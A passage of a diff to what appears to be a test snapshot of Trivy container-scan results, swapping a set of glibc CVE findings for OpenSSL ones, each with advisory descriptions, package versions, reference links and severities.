"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", - ], - }, - "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://ubuntu.com/security/notices/USN-6188-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1d-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1551", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", + "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", + "https://access.redhat.com/security/cve/CVE-2019-1551", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", + "https://github.com/openssl/openssl/pull/10575", + "https://linux.oracle.com/cve/CVE-2019-1551.html", + "https://linux.oracle.com/errata/ELSA-2020-4514.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", + "https://seclists.org/bugtraq/2019/Dec/39", + "https://seclists.org/bugtraq/2019/Dec/46", + "https://security.gentoo.org/glsa/202004-10", + "https://security.netapp.com/advisory/ntap-20191210-0001/", + "https://ubuntu.com/security/notices/USN-4376-1", + "https://ubuntu.com/security/notices/USN-4504-1", + "https://usn.ubuntu.com/4376-1/", + "https://usn.ubuntu.com/4504-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-1551", + "https://www.debian.org/security/2019/dsa-4594", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20191206.txt", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.tenable.com/security/tns-2019-09", + "https://www.tenable.com/security/tns-2020-03", + "https://www.tenable.com/security/tns-2020-11", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "There is an overflow bug in the x64_64 Montgomery squaring procedure used in exponentiation with 512-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against 2-prime RSA1024, 3-prime RSA1536, and DSA1024 as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH512 are considered just feasible. However, for an attack the target would have to re-use the DH512 private key, which is not recommended anyway. Also applications directly using the low level API BN_mod_exp may be affected if they use BN_FLG_CONSTTIME. Fixed in OpenSSL 1.1.1e (Affected 1.1.1-1.1.1d). Fixed in OpenSSL 1.0.2u (Affected 1.0.2-1.0.2t).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "name": "openssl: Integer overflow in RSAZ modular exponentiation on x86_64", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/nvd/cve-2019-1551", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://access.redhat.com/security/cve/CVE-2019-1551", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://github.com/openssl/openssl/pull/10575", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://linux.oracle.com/cve/CVE-2019-1551.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://linux.oracle.com/errata/ELSA-2020-4514.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://seclists.org/bugtraq/2019/Dec/39", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://seclists.org/bugtraq/2019/Dec/46", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://security.gentoo.org/glsa/202004-10", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://security.netapp.com/advisory/ntap-20191210-0001/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-4376-1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://ubuntu.com/security/notices/USN-4504-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://usn.ubuntu.com/4376-1/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://usn.ubuntu.com/4504-1/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1551", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.debian.org/security/2019/dsa-4594", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://www.openssl.org/news/secadv/20191206.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://www.oracle.com/security-alerts/cpujan2021.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://www.tenable.com/security/tns-2019-09", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://www.tenable.com/security/tns-2020-03", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://www.tenable.com/security/tns-2020-11", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1d-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-23841", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "http://seclists.org/fulldisclosure/2021/May/67", + "http://seclists.org/fulldisclosure/2021/May/68", + "http://seclists.org/fulldisclosure/2021/May/70", + "https://access.redhat.com/security/cve/CVE-2021-23841", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://linux.oracle.com/cve/CVE-2021-23841.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://support.apple.com/kb/HT212528", + "https://support.apple.com/kb/HT212529", + "https://support.apple.com/kb/HT212534", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://avd.aquasec.com/nvd/cve-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "http://seclists.org/fulldisclosure/2021/May/67", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "http://seclists.org/fulldisclosure/2021/May/68", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "http://seclists.org/fulldisclosure/2021/May/70", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://access.redhat.com/security/cve/CVE-2021-23841", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": 